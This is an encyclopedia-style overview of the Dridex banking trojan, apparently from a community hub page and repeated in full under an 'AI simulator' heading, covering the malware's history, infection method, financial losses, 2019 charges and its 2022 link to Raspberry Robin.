Community hub
Recent from talks
Knowledge base stats:
Talk channels stats:
Members stats:
Dridex
Dridex, also known as Bugat and Cridex, is a type of malware that specializes in stealing bank credentials through a system that utilizes macros from Microsoft Word.
It primarily targets Windows users who open malicious email attachments in Word or Excel, triggering macros that download Dridex and infect the system, exposing the user to banking theft.
Dridex is designed to steal banking information from infected machines and immediately launch fraudulent transactions. It installs a keyboard logger and performs injection attacks to capture sensitive data.
Dridex first appeared in 2012 as an evolution of the earlier Cridex and Bugat banking trojans. It incorporated elements of its predecessors’ code but introduced a peer-to-peer (P2P) communication architecture to enhance concealment and redundancy.
By 2015, it had become one of the most prevalent financial malware strains, particularly targeting banking credentials through email-based phishing campaigns and malicious macro-laden attachments. That year, theft attributed to Dridex was estimated at £20 million in the United Kingdom and $10 million in the United States, with attacks reported in more than 20 countries. In early September 2016, researchers observed the malware beginning to target cryptocurrency wallets.
In 2017, Dridex was distributed through a widespread phishing campaign that exploited a Microsoft Word zero-day vulnerability. This method allowed infection without requiring users to enable macros and affected millions of users globally. Around the same time, newer versions of Dridex began exploiting a vulnerability in Microsoft Office and WordPad that allowed remote code execution.
In December 2019, US authorities filed charges against two suspects believed to have created the Dridex malware, including the group's alleged leader.
In 2022, IBM researchers found similarities between the Raspberry Robin worm and Dridex malware loaders. Their comparative analysis showed that both used similar string decoding algorithms, anti-analysis techniques, and payload decryption routines. IBM suggested that Evil Corp may be using Raspberry Robin infrastructure to carry out attacks.
Hub AI
Dridex AI simulator
(@Dridex_simulator)
Dridex
Dridex, also known as Bugat and Cridex, is a type of malware that specializes in stealing bank credentials through a system that utilizes macros from Microsoft Word.
It primarily targets Windows users who open malicious email attachments in Word or Excel, triggering macros that download Dridex and infect the system, exposing the user to banking theft.
Dridex is designed to steal banking information from infected machines and immediately launch fraudulent transactions. It installs a keyboard logger and performs injection attacks to capture sensitive data.
Dridex first appeared in 2012 as an evolution of the earlier Cridex and Bugat banking trojans. It incorporated elements of its predecessors’ code but introduced a peer-to-peer (P2P) communication architecture to enhance concealment and redundancy.
By 2015, it had become one of the most prevalent financial malware strains, particularly targeting banking credentials through email-based phishing campaigns and malicious macro-laden attachments. That year, theft attributed to Dridex was estimated at £20 million in the United Kingdom and $10 million in the United States, with attacks reported in more than 20 countries. In early September 2016, researchers observed the malware beginning to target cryptocurrency wallets.
In 2017, Dridex was distributed through a widespread phishing campaign that exploited a Microsoft Word zero-day vulnerability. This method allowed infection without requiring users to enable macros and affected millions of users globally. Around the same time, newer versions of Dridex began exploiting a vulnerability in Microsoft Office and WordPad that allowed remote code execution.
In December 2019, US authorities filed charges against two suspects believed to have created the Dridex malware, including the group's alleged leader.
In 2022, IBM researchers found similarities between the Raspberry Robin worm and Dridex malware loaders. Their comparative analysis showed that both used similar string decoding algorithms, anti-analysis techniques, and payload decryption routines. IBM suggested that Evil Corp may be using Raspberry Robin infrastructure to carry out attacks.